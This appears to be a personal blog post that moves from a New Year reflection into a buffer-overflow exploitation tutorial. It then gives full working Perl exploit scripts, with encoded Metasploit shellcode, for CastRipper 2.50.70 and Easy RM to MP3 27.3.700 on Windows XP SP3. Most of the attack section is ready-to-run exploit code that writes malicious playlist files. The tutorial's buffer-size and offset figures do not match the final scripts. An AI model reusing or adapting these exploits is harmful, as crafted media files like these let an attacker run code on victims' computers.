Schaba's WebLog

I learned a lot things in last year lot good stuff,it was one of the best year for me,but the ending was bad and hard to forgot.Anyway good bye to 2009 and welcome to ’10.Hoping this year will be better than last year.

i decide to forgot the bad things happen in last year and look forward.something ended doesn’t mean it’s the end of world right.
some people say everything happen for good,but what happen with me wasn’t happen for good,i lost something that i can’t replace.
This year my resolution is forgot what had happen and look forward for a better future.Anyway i decide to study hard and get good results and hope someday some how i will get what i lost XD

Exam’s are too near so you won’t see much update till it end.

Boring days so i just thought write something that will give me some peace.yeahi just wanna show you guys
a quick DEMO of finding a buffer over flow vulnerability and exploit it. err though say its a quick demonstration this take
me some time to write all up.

I recently wrote Bof exploit for caster ripper so i will take it in this demonstration.

Before starting this i wanna tell you guys, to understand what i’m doing in here you gotta have some information about this subject.
and familier with these tools that help me in this process.

I will use thse tools in entire demo

1-Ollydbg (which i find cooler than windbg)

2-Metasploitframework (An awesome tool/framework)

3-Windows Xp installed on vmware

So lets attach the our vulnerable programe to debugger and send our junk data to it and crush it.
Hopefully this small perl script will crush it.
we are sending 5000 x41 which is nothing but 5000 A’s.

my $file= "crush.pls";
my $junk= "\x41" x 5000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

———————————————–
After crushing the CUP registers will look like this.
———————————————–

We can see EIP is overwritten with 41414141 which is AAAAAAA in our buffer.
Great we are now controlling EIP and lets find exact location to place our shell code.

so lets modify our perl script to send another buffer to the programe to crush it.Now we are sending 25000 A’s.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

Great now EIP is overwritten with 42424242 which is nothing but BBBBBB. so now we know our buffer size is between 2500 and 3000.

In order to find the exact location, we’ll use Metasploit. I’m going to use windows version of Metasploit
Which is located in C:\program files\metasploit\framwork3

C:\program files\metasploit\framwork3\msf3\tools\pattern_create.rb 5000

It will create unique 5000 patterns.
So lets modify our perl script again.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "place 5000 characters we created"
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

So now EIP is overwritten with our unique pattern’s 0x42316b42
lets find the offset of it. Here we go offset is 1076
C:\program files\metasploit\framwork3\msf3\tools\pattern_offset.rb 0x42316b42 5000
1076

Jumping to the shellcode.

Executable modules

Because this is a quick demonstration i won’t go much details about this.To find a JMP address you can use findjmp.c (which you can find from internet, just compile it and run it )

Usage of findjmp ( C:\findjmp kernel32.dll esp)

so i’m going to use this address 0x7D113B1F JMP ESP from SHELL32.dll WinXP SP3. You can replace this with some other address.

so lets write up complete exploit. Thats it XD . Don’t worry i skiped lot stuff in this becox it’s just a demo. lol. peace.

#!/usr/bin/perl
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;     # NOPs
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc
\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfully\n";

I wrote this exploit about 3 weeks ago and just send it to exploit DB at offensive security.This Application (CastRipper ) is suffer from stack based buffer overflow

Get it from exploit-db

#!/usr/bin/perl
# CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3
# Exploite By : d3b4g
# my webpage www.d3b4g.info
# From tiny islands of maldivies
# Tested on Windows XP SP3
# 24.12.2009
# I used Adress from SHELL32.dll.You can change it to your desired address.Use jmpfind.exe to find address.
print "CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit\n";
print "Exploit By : d3b4g";
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;     # NOPs

# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfully\n";

Last night i was  testing available exploits for Easy RM to MP3 converter and unfortunatly non of them work for me. so i decide to write my own exploit for that application.I wrote this exploit under windows XP SP3 and tested it.This application suffer from stack based buffer-overflow.

#
# Exploit for Easy RM to MP3 27.3.700 on  Windows Xp sp3
# By d3b4g
# tested on Windows XP SP3
# version:27.3.700
# Date:22.12.09
# From tiny islands of maldivies
#
my $file= "d3b4g.m3u";

my $junk= "A" x 26071;
my $eip = pack('V',0x7C836A08);  #jmp esp from  kernel32.dll
my $shellcode = "\x90" x 30;

# windows/exec - 144 bytes
#  Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Get it from exploit-db